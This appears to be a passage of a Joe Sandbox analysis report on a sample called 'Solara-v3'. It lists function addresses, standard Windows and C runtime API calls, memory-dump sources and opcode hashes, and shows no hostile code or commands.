                                                                                                                                                                                                                                              • API String ID: 943130320-905460609
                                                                                                                                                                                                                                              • Opcode ID: 325ef977625468b0809b2981d73e9bba4afd87e2e872e8eb69a5bf211bd488a4
                                                                                                                                                                                                                                              • Instruction ID: d0e4c21f50515673b77fa32208170047b5ff5417626af9c55c80d5fd861b2dd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325ef977625468b0809b2981d73e9bba4afd87e2e872e8eb69a5bf211bd488a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51E831A40705ABDB24AB75CC82FFB73A8EF05704F344829F56697182F670EA40E765
                                                                                                                                                                                                                                              Function 00C973E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C97526
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C97561
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: CreateThreadpoolWork.KERNEL32(00C9B060,00C98A2A,00000000), ref: 00C9AF46
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00C9AF53
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                              • String ID: Fail to schedule the chore!
                                                                                                                                                                                                                                              • API String ID: 3683891980-3313369819
                                                                                                                                                                                                                                              • Opcode ID: 793c309159b89a2bf501540badd6bf9573446732efc74a189471ecdd83e195ec
                                                                                                                                                                                                                                              • Instruction ID: 1870c8d1ea76ca8815421209b1f4336e3feae7f492e31dcf20959ec299be899d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 793c309159b89a2bf501540badd6bf9573446732efc74a189471ecdd83e195ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B519DB1911218DFCF05DF94D948BAEBBB0FF08314F144229E81A6B391D775AA05CF91
                                                                                                                                                                                                                                              Function 00CAB992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CAB893,?,?,00000000,00000000,00000000,?), ref: 00CAB9B7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: fbac9198bbffec7a8d949c76ff60707beb2b787f1685d0761e718f8b23fc6f46
                                                                                                                                                                                                                                              • Instruction ID: e80d0cf6610c124bb625fe88371f26ab797a988f92c948693c49de585d517636
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbac9198bbffec7a8d949c76ff60707beb2b787f1685d0761e718f8b23fc6f46
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50417C7190020AAFCF15DFA4CC81AEEBBB5FF49308F188159F924A7212D3359E50EB51
                                                                                                                                                                                                                                              Function 00C93E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C93EC6
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94002
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9ABE5
                                                                                                                                                                                                                                                • Part of subcall function 00C9ABC5: _Yarn.LIBCPMT ref: 00C9AC09
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 2070049627-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 18f1916631207a6d2bfb79ec77a533819457425db6c0d478e9f9ce88e4f50530
                                                                                                                                                                                                                                              • Instruction ID: ae366999bdcb40a1702a43e072b566ec46888b6a879336fde06ac6f3e84d8a84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18f1916631207a6d2bfb79ec77a533819457425db6c0d478e9f9ce88e4f50530
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D44162F1A007459BEB10DF69D80AB57BBF8BF04714F044628E4499B781E77AE618CBE1
                                                                                                                                                                                                                                              Function 00CAB1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CAB475
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: e9df07570ca4620ddc353e0e6b1fcc84144f130d3193f03ebe353398e877e2af
                                                                                                                                                                                                                                              • Instruction ID: b8d88eb3e92f490ed51751adbb3ef6df764c1ebcd3433037fd316e02aa15707c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9df07570ca4620ddc353e0e6b1fcc84144f130d3193f03ebe353398e877e2af
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231E971800217EFCF269F51CC409EA7B66FF0A31DB18465AF86449123C336DEA1EB81
                                                                                                                                                                                                                                              Function 00C9B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00C9B8B9
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(?,?,?,?,?), ref: 00C9B8DE
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,032E25E8,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                                • Part of subcall function 00CA8353: IsProcessorFeaturePresent.KERNEL32(00000017,00CAC224), ref: 00CA836F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                              • Opcode ID: ae30d4c93b46270b147c77a8bc1708a490dbb167901a33847433bd2abcbd63b3
                                                                                                                                                                                                                                              • Instruction ID: 2c8d3b34e75c3408a7a90ce20f8c63a488ac363cbf43403c56cd2b06a4434a9f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae30d4c93b46270b147c77a8bc1708a490dbb167901a33847433bd2abcbd63b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54217F31D0021CFBCF24DF95EA49AEEB7B9AF48710F150419E415AB190CB70AE55DB85
                                                                                                                                                                                                                                              Function 00C9B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 082f9a24b7e8bd52d24723d64a7d95643b50f7085e4fa17007e81809d1e418c6
                                                                                                                                                                                                                                              • Instruction ID: d681f029b47fccf35ee862b4936b741f3b12fdf5de77f81a3796146aa74c0606
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 082f9a24b7e8bd52d24723d64a7d95643b50f7085e4fa17007e81809d1e418c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401BCF1518302ABDB04AF28E846B5A7BE8AF0431CF11892CF46A8B301E375ED04CB81
                                                                                                                                                                                                                                              Function 00C92610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C9F354,032E25E8,?,?,?,00C9F354,00C93D4A,00CC759C,00C93D4A), ref: 00CA066D
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00C92673
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                              • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                              • Opcode ID: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction ID: 0ed3e70b5fcd0cd8eda0fbb1df72430f30941dca63ef91826a6485cba9964c93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e69ec1ec002993ecd6df679e9041e344936b1c3367141862c07f00da310e955
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F8F1514301ABDB04AF18E846B4BBBE4EB5575CF11881CF5999B300E3B5D844CB92

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00CB1A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AA0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00CB13BD,?,00000000), ref: 00CB1ADE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              • Opcode ID: 5c127e82c2ef795ca11be661dc7a9e5c24c2e9aadeb328d991808b30119cee00
                                                                                                                                                                                                                                              • Instruction ID: 13248eed2cfaf7399c018441475c7669a2b727dc2540c22c95048bedbadf6c87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c127e82c2ef795ca11be661dc7a9e5c24c2e9aadeb328d991808b30119cee00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE218622B02100AADB348F65C920BDB72AAEF54B54FEE8464ED1AD7104E732FF41E350
                                                                                                                                                                                                                                              Function 00C91FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00C91240: _strlen.LIBCMT ref: 00C912BA
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C92046
                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C9206B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C9207A
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00C920CD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C921FD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1490117831-0
                                                                                                                                                                                                                                              • Opcode ID: 8766e94d9721f6669394703e0a86440190631a9ba10354ed9413fdf3659b7e10
                                                                                                                                                                                                                                              • Instruction ID: 9ca4b8d43c567d61fb7b0063a99f1d38f30d60443d61300d43a8c35dc18fe07c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8766e94d9721f6669394703e0a86440190631a9ba10354ed9413fdf3659b7e10
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E971D3B2C002199BCF10DFA4DC49BAEBBB5FF48324F140629E854B7391E7319A55DBA1
                                                                                                                                                                                                                                              Function 00CB1287 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(00000000,?,00CAE58D), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000,?,?,00000028,00CA8363), ref: 00CAC210
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB138F
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00CB13CD
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00CB13E0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB1428
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB1443
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                                              • Opcode ID: 3cda30163d51af8a2d1394e9ee2e96cdbfca9f2bd1e1869c224eaeeb27b898a7
                                                                                                                                                                                                                                              • Instruction ID: 5e3d29eb867013b876b1c4f2a56b9b4da04086aaddf15d1bb4e3948a45cc171b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cda30163d51af8a2d1394e9ee2e96cdbfca9f2bd1e1869c224eaeeb27b898a7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4514B71A00216ABDB10EFA5CC95FFE77B8EF05700F984469FD11E71A0EB709A409B61
                                                                                                                                                                                                                                              Function 00CA9CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2032750567.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032737303.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032788967.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032807728.0000000000CCA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032821707.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032843496.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2032875479.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                              • Instruction ID: 5b9a90fcf6a376943938d9e5eed5a6873832d296ab81365dd138a1aa54190464
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
